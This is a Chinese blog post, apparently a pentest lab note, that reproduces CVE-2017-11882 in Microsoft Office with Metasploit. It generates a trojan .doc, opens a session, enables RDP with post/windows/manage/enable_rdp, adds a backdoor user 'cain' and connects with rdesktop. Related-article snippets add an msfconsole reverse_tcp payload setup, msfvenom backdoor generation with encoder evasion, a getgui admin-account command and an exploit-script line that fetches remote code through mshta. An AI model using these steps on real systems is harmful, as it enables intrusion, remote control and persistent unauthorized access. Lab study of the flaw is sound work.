CVE_2017_11882漏洞复现(Metasploit开启NT远程桌面添加账户)

最新推荐文章于 2023-01-30 14:51:37 发布
最新推荐文章于 2023-01-30 14:51:37 发布
阅读量293 收藏 1
点赞数
分类专栏: 渗透笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cainsoftware/article/details/118499971
版权

靶机安装windows office 2016

2.rb复制文件到攻击机的msf的模块文件下并刷新

这里注意:msf放到库文件下 不能用-   只能用下划线 _ 不然刷新库 不认

3.设置参数 运行并生成 木马doc

4.运行监听 靶机执行木马

注意: 这边连接后并不会直接回显,需要用seesions –i 1的方式来链接反弹

5.开启远程桌面      run post/windows/manage/enable_rdp

6.添加远程桌面密码run post/windows/manage/enable_rdp USERNAME=cain PASSWORD=cain

7.连接远程桌面  命令: rdesktop 192.168.128.6

cainsoftware
关注
专栏目录
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
[网络安全自学篇] 九十二.《Windows黑客编程技术详解》之病毒启动技术创建进程API、突破SESSION0隔离、内存加载详解(3)
热门推荐
杨秀璋的专栏
07-27 2万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充知识点。第三篇文章主要介绍木马病毒启动技术,包括创建进程API、突破SESSION0隔离、内存加载详解,希望对您有所帮助。
Metasploit远程代码执行
小飞鸟
11-02 1024
Metasploit之远程代码执行 本次漏洞利用的是ms08-067的XP漏洞 metasploit下进行操作 search 08-067            -->搜索漏洞相关的模块,得到exploit/windows/smb/ms08_067_netapi use exploit/windows/smb/ms08_067_netapi        -->使用这个漏洞模块...
metasploit 远程连接服务器
cs_xiaoqiang的博客
01-23 2107
目标ip:192.168.0.101 本机ip:192.168.0.104 打开metasploit 找到到相应的模块,因为我也记不住这个模块,所以先搜索相关的在查找。 找到相应的模块 进入该模块 查看完整的配置信息 这里必要的配置,只有一个,那就是本机ip。因为要在服务器上运行,并连接本机ip。 运行,得到相应的代码。 在服务器的命令行下运行这段代码
MSF渗透测试-CVE-2017-11882(MSOffice漏洞
weixin_30652491的博客
04-18 397
1.测试环境 2.测试前准备 3.测试过程 —3.1虚拟机环境测试 —3.2局域网靶机测试 4.测试感想 1.测试环境 攻击机: OS:kail IP:192.168.15.132/192.168.137.231 靶机: OS:Windows7 Office版本:Office2013_CN IP: 2.测试前准备 1.下载python脚本 2.下载MSF组件 3.将cve_2017_...
简单远程控制 Metasploit应用
m0_62659165的博客
11-22 325
简单远程控制 Metasploit应用
metasploit利用CVE-2017-11882
公众号shadow sock7
08-19 1208
./msfconsole use exploit/windows/fileformat/cve_2017_11882 set URIPATH test set payload windows/meterpreter/reverse_tcp set lhost 172.18.126.113 set FILENAME helloword.doc
漏洞CNNVD-201805-248的复现与提权
weixin_43434933的博客
06-23 1126
实验原理介绍(图文) 本次实验实现漏洞CNNVD-201805-248的复现与入侵,以及后续的提权管理员和留后门操作。 漏洞基本信息: 漏洞名称:Microsoft Windows VBScript 引擎安全漏洞 CNNVD编号:CNNVD-201805-248 CVE编号:CVE-2018-8174 危害等级:高危 漏洞类型:缓冲区错误 威胁类型:远程 发布时间:2018-05-10 漏洞简...
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5650
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
kali攻防第9章 Metasploit之我的远程控制软件
安全参透之旅
12-07 1万+
准备工具 1、KALI系统 IP 10.10.10.131 2、受害系统 IP 10.10.10.133     步骤: 1、生成木马控制程序 root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=10.10.10.131 LPORT=44
CVE-2017-11882CVE-2017-11882(通杀Office 2003到2016)
03-04
CVE-2017-11882概述 从突破利用效果来看,它可以通杀Office 2003到2016的所有版本,并且整个攻击环境的内置非常简单。此突破是由Office软件里面的[公式编辑器]造成的,由于编辑器进程没有对举个例子,如果黑客利用这个漏洞,构造带有外壳后门的office文件,当普通用户打开这个office文件,则电脑可以被黑客直接控制。 影响版本: office 2003 office 2007 office 2010 office 2013 office 2016 用法 python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc 点击生成的“ test.doc”,顺利投放计算机工具。 python Command_CVE-2017-11882.py -c "mshta http://192.
利用Metasploit控制目标电脑(Win7_x64系统)
天涯的浪子
07-28 826
MSF,是The Metasploit Framework的简称。MSF是一个非常好用的渗透框架,里面集成了许多框架和工具;MSF高度模块化,即框架由多个module组成。进一步解释,是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新;metasploit涵盖了渗透测试中全过程,可以在这个框架下利用现有的Payload进行一系列的渗透测试。 MS17-010(永恒之蓝)漏洞简介 永恒之蓝是指2017年4月14日晚,黑客团体Shado...
off CVE-2017-11882漏洞复现
weixin_44664530的博客
04-22 363
CVE-2017-11882漏洞影响版本 office 2003 office 2007 office 2010 office 2013 office 2016 复现环境 win7 kali office 2016 office2016分享链接:https://pan.baidu.com/s/15YrwY7_1OOFSgpsleS2O5A 提取码:d1lo 下载组件 下载 https://gith...
Metasploit--后渗透--创建一个新账号
千寻的博客
02-18 3258
文章目录查看目标主机有哪些用户可以在目标系统中创建一个新的用户账号查看系统用户组将hack用户添加到管理员用户组。 查看目标主机有哪些用户 run post/windows/gather/enum_logged_on_users 可以在目标系统中创建一个新的用户账号 run getgui -u hack -p qwe 这个命令会创建用户,并把他添加到 Administrators 组中,这样该用户就拥有远程桌面的权限了。这里成功创建用户,但是添加到Administrators组中失败了 ! 如果
kali metasploit 制作后门程序远程操控基本使用方法
qq_51685718的博客
12-03 4187
kali metasploit制作后门程序远程操控基本使用方法 1.后门程序的制作与加密 后门的实质就是木马 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.34.53 lport=10000 -f exe -o biyu.exe lhost后面加的是本机ip,lport后面加的是想要打开的端口号 执行后会在本地生成一个biyu.exe的文件 如果直接上传到win系统会被杀毒软件杀掉,我们可以用自己的电脑对其进行一个加壳操作。 下
Metasploit工具使用(下)
最新发布
剁椒鱼头没剁椒的博客
01-30 1725
The Metasploit Framework 的简称。MSF 高度模块化,即框架由多个 module 组成,是全球最受欢迎的渗透测试工具之一。是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode ,并持续保持更新。metasploit 涵盖了渗透测试中全过程,你可以在这个框架下利用现有的 Payload进行一系列的渗透测试。
白帽黑客之Metasploit
10-25
本套教程,我们将为大家详细讲解Metasploit的使用方法。Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。 
【简单远程控制】 Metasploit应用
qq_61947585的博客
11-21 1319
远程控制 Metasploit应用
Metasploit利用远程桌面协议RDP拒绝访问漏洞(MS12-020)
浮生若梦的专栏
06-22 1万+
漏洞版本: Microsoft Windows XP Professional Microsoft Windows XP Home Microsoft Windows Server 2003 Standard Edition Microsoft Windows Server 2003 Enterprise Edition Microsoft Windows Server 2003 Datac
CVE-2017-3506 漏洞POC复现详细解析
同时,“cve-2017-3506复现”指的是如何在安全研究环境中重现这个漏洞,这对于了解漏洞细节、评估漏洞影响和测试潜在的补丁非常关键。 最后,在压缩包文件名称列表中只有一个文件“CVE-2017-3506-Poc.py”。这个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值